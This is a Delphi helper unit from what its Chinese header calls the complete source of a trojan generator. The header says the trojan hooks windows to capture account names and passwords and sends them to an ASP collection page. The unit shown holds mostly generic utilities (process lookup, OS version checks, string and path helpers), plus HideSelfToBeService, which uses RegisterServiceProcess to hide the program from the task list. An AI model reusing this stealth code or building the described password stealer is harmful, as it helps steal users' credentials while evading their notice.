rejoicebase.pas

面对面 木马生成器 完整代码 程序仅提供测试学习 全局钩子查找句柄截获 使用ASP收信 收信地址明文（测试而已没加密） //本软件主要是截获账号和密码 带了个简单发信

unit RejoiceBase;

interface

uses
  Windows, Messages,Tlhelp;

const
  CM_DebugMessage = WM_USER + $1001;
  CM_PostMessage = WM_USER + $1002;
  CM_EndHookMessage = WM_USER + $1003;
  CM_ReHookMessage = WM_USER + $1004;
  CM_DisableHotkey = WM_USER + $1005;

const
  cOsUnknown              : Integer = -1;
  cOsWin95                : Integer =  0;
  cOsWin98                : Integer =  1;
  cOsWin98SE              : Integer =  2;
  cOsWinME                : Integer =  3;
  cOsWinNT                : Integer =  4;
  cOsWin2000              : Integer =  5;
  cOsWhistler             : Integer =  6;

const
  FileMappingName = 'LLLLLReceptor___';

procedure MsgBox(Text: string; Caption: String = '信息');
procedure HideSelfToBeService;
function GetProcessID(ProcName: String): Integer;
function GetOSVersion: Integer;
function JudgeSystem: Integer;
function GetExeName: String;
function GetExeAllName: String;
function GetWinPath: string;

function LowerCase(const S: string): string;
function IntToStr( Value : Integer ): String;
function StrToInt(const Value : String) : Integer;
function AnsiStrIComp(S1, S2: PChar): Integer;
function ExtractFileName(const Path : String ) : String;
function ExtractFilePath(const Path: String) : String;
function ExtractFileExt(const Path: String) : String;

implementation

procedure MsgBox(Text: string; Caption: String);
begin
  MessageBox(0, PChar(Text), PChar(Caption), MB_OK or MB_ICONINFORMATION);
end;

procedure HideSelfToBeService;
var Pid:DWORD;
    //Regserv:DWORD;
    LibHandle:HWND;
    DllName:function(dwProcessId,dwType:DWORD):DWORD;stdcall;
begin
  LibHandle:=LoadLibrary('kernel32.dll');
  if LibHandle < 32 then
  begin
    Exit;
  end;
  @DllName:=GetProcAddress(LibHandle,'RegisterServiceProcess');
  if @DllName = nil then
  begin
    FreeLibrary(LibHandle);
    Exit;
  end;
  try
    Pid := GetCurrentProcessId;
    DllName(pid, 1);    //Regserv :=    RegisterServiceProcess
  finally
    FreeLibrary(LibHandle);
  end;
end;

function GetProcessID(ProcName: String): Integer;
var
  hProcSnap: THandle;
  pe32: TProcessEntry32;
begin
  Result := -1;
  hProcSnap := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS,0);
  if hProcSnap = INVALID_HANDLE_VALUE then Exit;
  pe32.dwSize := SizeOf(ProcessEntry32);
  if Process32First(hProcSnap, pe32) = True then
  while Process32Next(hProcSnap, pe32) = True do
  begin
    if AnsiStrIComp(PChar(ExtractFilename(pe32.szExefile)),
                    PChar(ExtractFilename(ProcName))) = 0 then
      begin
        Result := pe32.th32ProcessID;
        break;
      end;
  end;
  CloseHandle(hProcSnap);
end;

function GetOSVersion: Integer;
var
  osVerInfo          : TOSVersionInfo;
  majorVer, minorVer : Integer;
begin
  //Result := cOsUnknown;
  osVerInfo.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  If ( GetVersionEx(osVerInfo) ) then
  begin
    majorVer := osVerInfo.dwMajorVersion;
    minorVer := osVerInfo.dwMinorVersion;
    case osVerInfo.dwPlatformId of
    VER_PLATFORM_WIN32_NT : { Windows NT/2000 }
      begin
        if ( majorVer <= 4 ) then
          Result := cOsWinNT
        else if ((majorVer = 5) and (minorVer = 0)) then
          Result := cOsWin2000
        else
          if ((majorVer = 5) and (minorVer = 1)) then
            Result := cOsWhistler
          else
            Result := cOsUnknown;
      end;
    VER_PLATFORM_WIN32_WINDOWS :  { Windows 9x/ME }
    begin
      if ((majorVer = 4) and (minorVer = 0)) Then
        Result := cOsWin95
      else if ((majorVer = 4) and (minorVer = 10)) then
      begin
        if (osVerInfo.szCSDVersion[ 1 ] = 'A') then
          Result := cOsWin98SE
        else
          Result := cOsWin98;
      end else if ((majorVer = 4) and (minorVer = 90)) then
        Result := cOsWinME
      else
        Result := cOsUnknown;
      end;
    else
      Result := cOsUnknown;
    End;
  end else
    Result := cOsUnknown;
end;

function GetExeName: String;
begin
  Result := LowerCase(ExtractFileName(GetExeAllName));
end;

function GetExeAllName: String;
var
  Buffer: array[0..260] of Char;
begin
  if GetModuleFileName(0, Buffer, 260) <> 0 then
    Result := LowerCase(Buffer)
  else
    Result := '';
end;

function GetWinPath: string;
var
  Buf: array[0..MAX_PATH] of Char;
begin
  GetWindowsDirectory(Buf, MAX_PATH);
	Result := Buf;
	if Result[Length(Result)]<>'\' then
  Result:=Result+'\';
end;

function JudgeSystem: Integer;
var
  OS : TOSVersionInfo;
begin
  result:=0;
  OS.dwOSVersionInfoSize := sizeof(TOSVERSIONINFO);
  GetVersionEx(OS);
  case OS.dwPlatformId of
    VER_PLATFORM_WIN32s         :result:=1;
    VER_PLATFORM_WIN32_WINDOWS  :result:=2;
    VER_PLATFORM_WIN32_NT	      :result:=3;
    //VER_PLATFORM_WIN32_WINDOWSXP:result:=4;
  end;
end;

function AnsiStrIComp(S1, S2: PChar): Integer;
begin
  Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, S1, -1,
    S2, -1) - 2;
end;

function LowerCase(const S: string): string;
var
  Ch: Char;
  L: Integer;
  Source, Dest: PChar;
begin
  L := Length(S);
  SetLength(Result, L);
  Source := Pointer(S);
  Dest := Pointer(Result);
  while L <> 0 do
  begin
    Ch := Source^;
    if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32);
    Dest^ := Ch;
    Inc(Source);
    Inc(Dest);
    Dec(L);
  end;
end;

function IntToStr( Value : Integer ): String;
var Buf : array[ 0..15 ] of Char;
    Dst : PChar;
    Minus : Boolean;
    D: DWORD;
begin
  Dst := @Buf[ 15 ];
  Dst^ := #0;
  Minus := False;
  if Value < 0 then
  begin
    Value := -Value;
    Minus := True;
  end;
  D := Value;
  repeat
    Dec( Dst );
    Dst^ := Char( (D mod 10) + Byte( '0' ) );
    D := D div 10;
  until D = 0;
  if Minus then
  begin
    Dec( Dst );
    Dst^ := '-';
  end;
  Result := Dst;
end;

function S2Int( S: PChar ): Integer;
var M : Integer;
begin
   Result := 0;
   if S = '' then Exit;
   M := 1;
   if S^ = '-' then
   begin
      M := -1;
      Inc( S );
   end
     else
   if S^ = '+' then
     Inc( S );
   while S^ in [ '0'..'9' ] do
   begin
      Result := Result * 10 + Integer( S^ ) - Integer( '0' );
      Inc( S );
   end;
   if M < 0 then
      Result := -Result;
end;

function StrToInt(const Value : String) : Integer;
begin
  Result := S2Int( PChar( Value ) );
end;

function StrLen(const Str: PChar): Cardinal; assembler;
asm
        XCHG    EAX, EDI
        XCHG    EDX, EAX
        OR      ECX, -1
        XOR     EAX, EAX
        CMP     EAX, EDI
        JE      @@exit0
        REPNE   SCASB
        DEC     EAX
        DEC     EAX
        SUB     EAX,ECX
@@exit0:
        MOV     EDI,EDX
end;

function StrRScan(const Str: PChar; Chr: Char): PChar; assembler;
asm
  {$IFDEF F_P}
        MOV     EAX, [Str]
        MOVZX   EDX, [Chr]
  {$ENDIF F_P}
        PUSH    EDI
        MOV     EDI,Str
        MOV     ECX,0FFFFFFFFH
        XOR     AL,AL
        REPNE   SCASB
        NOT     ECX
        STD
        DEC     EDI
        MOV     AL,Chr
        REPNE   SCASB
        MOV     EAX,0
        JNE     @@1
        MOV     EAX,EDI
        INC     EAX
@@1:    CLD
        POP     EDI
end {$IFDEF F_P} [ 'EAX', 'EDX', 'ECX' ] {$ENDIF};

function __DelimiterLast( Str: PChar; Delimiters: PChar ): PChar;
var
    P, F : PChar;
begin
  P := Str;
  Result := P + StrLen( Str );
  while Delimiters^ <> #0 do
  begin
    F := StrRScan( P, Delimiters^ );
    if F <> nil then
    if (Result^ = #0) or (Integer(F) > Integer(Result)) then
       Result := F;
    Inc( Delimiters );
  end;
end;

function ExtractFileName(const Path: String) : String;
var P: PChar;
begin
  P := __DelimiterLast( PChar( Path ), ':\' );
  if P^ = #0 then
    Result := Path
  else
    Result := P + 1;
end;

function ExtractFilePath(const Path: String) : String;
var
  P, P0: PChar;
begin
  P0 := PChar( Path );
  P := __DelimiterLast( P0, ':\' );
  if P^ = #0 then
    Result := ''
  else
    Result := Copy( Path, 1, P - P0 + 1 );
end;

function ExtractFileExt( const Path : String ) : String;
var P: PChar;
begin
  P := __DelimiterLast( PChar( Path ), '.' );
  Result := P;
end;

end.